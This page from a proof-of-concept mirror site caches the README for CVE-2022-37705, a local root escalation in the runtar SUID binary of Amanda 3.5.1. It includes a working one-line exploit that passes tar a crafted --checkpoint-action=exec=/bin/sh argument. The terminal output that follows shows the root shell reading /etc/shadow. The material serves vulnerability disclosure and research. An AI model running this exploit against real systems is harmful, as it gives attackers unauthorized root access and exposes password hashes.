Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2022-37705 PoC — Amanda 参数注入漏洞

Source
https://github.com/MaherAzzouzi/CVE-2022-37705
Associated Vulnerability
Title:Amanda 参数注入漏洞 (CVE-2022-37705)
Description:Amanda是University of Maryland at College Park组织的一种自动网络磁盘存档器。允许 IT 管理员设置单个主备份服务器,以通过网络将多个主机备份到磁带驱动器/转换器或磁盘或光学介质。 Amanda 存在安全漏洞,该漏洞源于为runtar SUID二进制文件精心设计的参数会导致本地权限升级到root。
Description
Amanda 3.5.1 second LPE.
Readme
> [Suggested description]
> A privilege escalation flaw was found on Amanda 3.5.1 that can take
> backup user to root privileges. The vulnerable component is the runtar
> SUID that is just a wrapper to run /usr/bin/tar with specific arguments
> that are controllable by the attacker. The program does not check
> correctly the args passed to tar binary (it assumes that all args
> should be like this --ARG VALUE but we can provide this --ARG=VALUE as
> one argument).
>
> ------------------------------------------
>
> [Additional Information]
> This flaw can be used for Code Execution, Denial of Service, Escalation of Privileges and Information Disclosure.
> This is the PoC to exploit it and get a root shell:
> backup@maher:/lib/amanda$ id
> uid=34(backup) gid=34(backup) groups=34(backup),6(disk),26(tape)
>
> backup@maher:/lib/amanda$ head /etc/shadow
> head: cannot open '/etc/shadow' for reading: Permission denied
>
> backup@maher:/lib/amanda$ ./runtar NOCONFIG tar  --create --file=/dev/null --checkpoint=1 --directory=. --checkpoint-action=exec=/bin/sh /dev/null
> tar: Removing leading `/' from member names
> # head /etc/shadow
> root:!:19132:0:99999:7:::
> daemon:*:19101:0:99999:7:::
> bin:*:19101:0:99999:7:::
> sys:*:19101:0:99999:7:::
> sync:*:19101:0:99999:7:::
> games:*:19101:0:99999:7:::
> man:*:19101:0:99999:7:::
> lp:*:19101:0:99999:7:::
> mail:*:19101:0:99999:7:::
> news:*:19101:0:99999:7:::
> #
>
> ------------------------------------------
>
> [VulnerabilityType Other]
> Flawed Arguments Checking.
>
> ------------------------------------------
>
> [Vendor of Product]
> Amanda
>
> ------------------------------------------
>
> [Affected Product Code Base]
> runtar - 3.5.1
>
> ------------------------------------------
>
> [Affected Component]
> The affected SUID binary is : runtar
> The affected file is : runtar.c
> The affected lines of code start at line 162.
>
> ------------------------------------------
>
> [Attack Type]
> Local
>
> ------------------------------------------
>
> [Impact Code execution]
> true
>
> ------------------------------------------
>
> [Impact Denial of Service]
> true
>
> ------------------------------------------
>
> [Impact Escalation of Privileges]
> true
>
> ------------------------------------------
>
> [Impact Information Disclosure]
> true
>
> ------------------------------------------
>
> [Attack Vectors]
> To exploit the binary you just have to give crafted arguments to the runtar SUID binary to escalate to root.
>
> ------------------------------------------
>
> [Reference]
> http://www.amanda.org/
>
> ------------------------------------------
>
> [Discoverer]
> Maher Azzouzi

Use CVE-2022-37705.
File Snapshot

 [4.0K]  /data/pocs/3ce26f38b46ecfe5b02666ae5f36a4b7d4fd9f93
└── [2.6K]  README.md

0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.